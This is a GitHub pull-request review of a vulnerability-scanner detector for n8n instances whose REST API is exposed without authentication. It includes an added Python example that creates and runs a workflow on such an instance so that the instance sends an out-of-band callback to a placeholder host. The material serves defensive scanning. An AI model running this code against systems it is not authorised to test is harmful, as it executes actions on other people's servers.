Conversation
robert-doyensec left a comment
Thank you for the updates. A few suggestions to help debugging later. Is there any way a workflow could be created that executes code, to be 100% sure that it is vulnerable? Let me know what you think related to that. There's a strong preference for using an RCE payload that sends an out-of-band callback request using the T_CBS_URI variable if possible.
    "Ensure authentication is properly enforced for the n8n instance and that it "
    "is not exposed to untrusted networks. Verify that REST API endpoints are "
    "protected, especially in older or partially initialized deployments. Refer "
    "to https://docs.n8n.io/hosting/securing/overview/ for guidance."
I think part of the recommendation should be to upgrade the n8n version, since this only detects older versions.
templated/templateddetector/plugins/exposedui/N8N_ExposedRestApi.textproto (review threads resolved)
@robert-doyensec, thanks for the update. Yes, that's possible, but it will look like another detector. If unauthenticated access to /rest/workflows is available, a workflow can be created (or imported from a file definition) that includes an HTTP Request node (or an Execute Command node, if enabled) pointing to {{T_CBS_URI}}. Triggering the workflow will result in an outbound request, providing a reliable OOB signal. There may be some minor adjustments required depending on the n8n version (e.g., differences in REST paths or execution/activation flows across earlier and later 0.x releases).
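The OOB check sketched in the reply above, written out as an added example; this is not code from the PR or from the Tsunami templated detector, and it is not the n8n project's own API client. It builds an n8n workflow definition containing a single HTTP Request node whose URL is the `{{T_CBS_URI}}` placeholder, substitutes the callback URL the way the templated detector would fill that variable, and plans the two REST calls (create, then run) against an instance that accepts unauthenticated requests. The `/rest/workflows` create path comes from the reply; the `/rest/workflows/run` path, its `{"workflowData": ...}` body, and the typeVersion-1 parameter names of the `n8n-nodes-base.httpRequest` node are assumptions about 0.x releases and may need the per-version adjustments the reply mentions. The network opener is injectable so the payload logic can be exercised without a live target.

```python
"""Added example: OOB callback workflow for an unauthenticated n8n REST API.

Assumptions (not taken from the PR or from n8n's documentation):
  - POST /rest/workflows/run accepts {"workflowData": <workflow>} and executes it once.
  - The HTTP Request node (typeVersion 1) takes "url" and "requestMethod" parameters.
"""
import json
import urllib.request
from typing import Callable, Dict, List

HTTP_REQUEST_NODE = "n8n-nodes-base.httpRequest"
CALLBACK_PLACEHOLDER = "{{T_CBS_URI}}"


def build_oob_workflow(callback_url: str, name: str = "oob-callback-check") -> dict:
    """Return a workflow definition with one HTTP Request node that fetches callback_url.

    Top-level keys follow n8n's exported workflow JSON (nodes + connections); a single
    node needs no connections. The node's parameter layout is the typeVersion-1
    assumption stated above.
    """
    return {
        "name": name,
        "nodes": [{
            "parameters": {"url": callback_url, "requestMethod": "GET", "options": {}},
            "name": "OOB callback",
            "type": HTTP_REQUEST_NODE,
            "typeVersion": 1,
            "position": [250, 300],
        }],
        "connections": {},
        "active": False,
        "settings": {},
    }


def render_placeholders(text: str, values: Dict[str, str]) -> str:
    """Substitute {{NAME}} placeholders in a request body.

    Simplified stand-in for the templated detector's variable substitution;
    it is not Tsunami's implementation.
    """
    for key, value in values.items():
        text = text.replace("{{" + key + "}}", value)
    return text


def callback_urls(workflow: dict) -> List[str]:
    """URLs that the workflow's HTTP Request nodes would contact when executed."""
    return [n["parameters"]["url"] for n in workflow["nodes"] if n["type"] == HTTP_REQUEST_NODE]


def plan_requests(base_url: str, workflow: dict) -> List[dict]:
    """The two calls an instance without authentication would accept.

    Create the workflow via POST /rest/workflows, then execute it once via
    POST /rest/workflows/run (assumed path and body shape for 0.x releases).
    """
    base = base_url.rstrip("/")
    return [
        {"method": "POST", "url": base + "/rest/workflows", "body": json.dumps(workflow)},
        {"method": "POST", "url": base + "/rest/workflows/run",
         "body": json.dumps({"workflowData": workflow})},
    ]


def send(req: dict, opener: Callable = urllib.request.urlopen, timeout: float = 10) -> int:
    """Perform one planned request and return its HTTP status code."""
    request = urllib.request.Request(
        req["url"], data=req["body"].encode(), method=req["method"],
        headers={"Content-Type": "application/json"},
    )
    with opener(request, timeout=timeout) as resp:
        return resp.status


def trigger_oob(base_url: str, callback_url: str,
                opener: Callable = urllib.request.urlopen) -> List[int]:
    """Fill {{T_CBS_URI}}, create and run the workflow, return the two status codes.

    A callback hitting callback_url afterwards is the positive signal; the status
    codes alone only show the endpoints accepted the unauthenticated requests.
    """
    template = json.dumps(build_oob_workflow(CALLBACK_PLACEHOLDER))
    workflow = json.loads(render_placeholders(template, {"T_CBS_URI": callback_url}))
    return [send(r, opener) for r in plan_requests(base_url, workflow)]


if __name__ == "__main__":
    # Dry run: show the planned requests without contacting anything.
    wf = build_oob_workflow("http://callback.example/oob-token")  # constructed URL
    for planned in plan_requests("http://n8n.local:5678", wf):
        print(planned["method"], planned["url"], planned["body"][:60] + "...")
```

On a real target the success condition is the inbound hit on the callback listener, not the status codes; the created workflow should also be deleted afterwards, which this example does not do.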
…pi.textproto Co-authored-by: Robert Dick <robert@doyensec.com>
…pi.textproto Co-authored-by: Robert Dick <robert@doyensec.com>
LGTM - Approved Reviewer: Robert, Doyensec
Detector for an exposed n8n REST API.
Testbed at google/security-testbeds#199